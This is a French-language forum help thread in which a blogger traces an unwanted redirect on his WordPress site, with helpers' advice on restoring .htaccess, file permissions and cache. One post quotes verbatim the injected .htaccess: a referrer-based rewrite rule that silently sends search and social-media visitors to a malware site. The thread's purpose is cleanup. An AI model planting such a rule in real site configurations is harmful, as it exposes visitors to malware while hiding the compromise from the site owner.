Problème de redirection non désiré

[Tetinou]

Hello,

il y une semaine mon blog a été victime d'une modification de code dans son design qui redirigeait vers un site a contenu malveillant, ceci étant dit j'avais faire une sauvegarde général du blog et j'avais chercher en local d'où venait le problème. Le problème venait apparemment d'un design que j'avais pourtant télécharger sur le site officiel de wordpress.

Enfin bref, tout était régler, cet après-midi je m'étais amuser a faire une nouvelle page d'accueil (index.html) et paf lorsque j'entre l'adresse de mon site je suis de suite redirigé vers un site Russe bloqué par Google.

J'ai analyser les fichiers présent dans mon serveur FTP, et tout est clean, j'ai même tout enlever de mon serveur mais il y a quand même redirection .

J'ai tout déplacer sauf mon blog qui ne se trouve pas à la racine du serveur mais dans /blog.

Quelqu'un aurait une idée?

[yuston]

Salut.

Est-ce que ton client FTP est configuré de sorte à afficher les fichiers cachés?

Est-ce qu'il y a la présence d'un fichier htaccess?

La redirection se fait même via d'autres navigateurs?

As-tu testé cela sur un autre ordinateur (car ton ordinateur a peut-être subi des modifications, genre le fichier hosts).

Est-il possible d'avoir l'adresse du site?

[Tetinou]

Salut yuston,

mon site est dispo à cette adresse: http://www.tetinou.fr/ le blog http://www.tetinou.fr/blog/

Je n'ai pas d'htacess dans la racine mais un dans le blog oui, j'avais trouver un htaccess à la racine que j'ai virer car je ne savais pas d'où il venait, j'ai aussi par sécurité changer les mots de passes de mon blog et du serveur ftp.

Oui j'ai essayer du PC de ma femme.

[Dan]

Manifestement ton site redirige vers un site russe malveillant.

Soit ton fichier htaccess a été modifié, soit ce sont tes sources ou ton template.

Le site russe contient un Virus ! Et la redirection n'intervient qu'après que tu rediriges ta page d'accueil vers ton blog !

Donc c'est soit le htaccess du blog, soit l'un de ses fichiers.

Dan

PS: inutile de poster 6 fois le même message. Tu es un nouveau membre et un message avec un lien doit être validé par un modérateur. Avant cela il ne sera pas visible !

[Tetinou]

Désolé du double post mais je viens de m'apercevoir que j'ai effectivement un fichier htaccess, je l'ai télécharger afin de l'éditer et j'ai trouver mes réponses!

<IfModule mod_rewrite.c>																														
RewriteEngine On																														
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)																														
RewriteRule ^(.*)$ http://firmhansy.ru/ride/index.php [R=301,L]																														
</IfModule>	

[Dan]

Vire cette ligne :

RewriteRule ^(.*)$ http://firmhansy.ru/ride/index.php [R=301,L]

Vire aussi la précédente qui ne sert à rien !

En fait, vire la totale !

Mais tu dois avoir normalement un fichier .htaccess Wordpress... il a été remplacé par celui-ci !

[Tetinou]

J'ai modifier le fichier .htacess de la racine celui qui est dans le dossier du blog est clean:

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /blog/
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /blog/index.php [L]
</IfModule>

# END WordPress

Modifié 8 Décembre 2011 par Dan

[Dan]

Normalement le .htaccess de wordpress devrait ressembler à ceci :

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Il faut changer les permissions du fichier et supprimer le droit d'écriture !

[Tetinou]

Merci Dan,

j'ai remplacer le .htaccess du blog par celui que tu ma fourni tout en éditant les dossiers "/" par "/blog/".

Ceci étant dit j'ai toujours la redirection lorsque j'essais d'accéder a tetinou.fr mais pas de redirection lorsque je vais directement sur tetinou.fr/blog/.

PS: Finalement je on a plus accès au blog "403 - Forbidden".

Modifié 8 Décembre 2011 par Tetinou

[Dan]

Regarde bien que tu n'aies pas de .htaccess à la racine !

Les fichiers dont le nom commence par un point sont le plus souvent cachés pour les clients ftp.

<edit> Là on n'a plus du tout accès. Vérifie les permissions du répertoire racine !

C'est ton

RewriteRule . /blog/index.php [L]

à mon avis...

Remplace-le par

RewriteRule . blog/index.php [L]

[Tetinou]

C'est bon j'ai corriger les permissions!

C'était les permissions de lecture et d’exécution publique qui était décoché.

Modifié 8 Décembre 2011 par Tetinou

[Dan]

Assure-toi que les permissions de tes fichiers ne permettent pas l'écriture, sauf pour les répertoires demandés par Wordpress.

Et ça devrait être mieux

[Tetinou]

J'avais le fichier wp-config.php qui avait la permission publique d'y écrire je ne sais pas si c'est normal ou pas mais j'ai enlever ce droit.

Ceci dit le problème de redirection est toujours présent .

Modifié 8 Décembre 2011 par Tetinou

[Dan]

Le répertoire racine, et les fichiers .htaccess aussi

Moi je ne vois plus de redirection... c'est peut-être ton cache de navigateur ! Vide-le !

[Tetinou]

Le répertoire racine est OK, les fichiers aussi mais je n'ai pas de .htaccess je l'avais viré tout à l'heure. Je n'ai garder que celui du blog.

PS: Merci Dan, j'ai vider le cache est c'est OK.

Je te remercie pour tout en tout cas .

Modifié 8 Décembre 2011 par Tetinou

[Dan]

Comme quoi, pour le jour de ton inscription, le Hub t'a bien servi !

[Tetinou]

Comme quoi, pour le jour de ton inscription, le Hub t'a bien servi !

Preuve que c'est un support efficace! Je gambade dans les topics et le HUB est une vrai mine d'or! .